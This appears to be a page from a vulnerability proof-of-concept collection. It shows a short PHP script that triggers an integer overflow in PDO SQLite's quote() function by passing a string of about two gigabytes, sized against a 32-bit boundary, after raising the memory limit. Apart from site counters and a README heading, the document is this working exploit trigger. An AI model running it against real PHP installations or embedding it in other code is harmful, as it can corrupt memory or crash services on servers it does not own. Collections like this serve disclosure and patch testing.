4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / pdo-sqlite3-quote-poc.php PHP
<?php
ini_set('memory_limit', '16G');
$conn = new PDO('sqlite:./placeholder.sql3');
$conn->quote(str_repeat("a", intdiv(0x100000001 - 3 , 2)));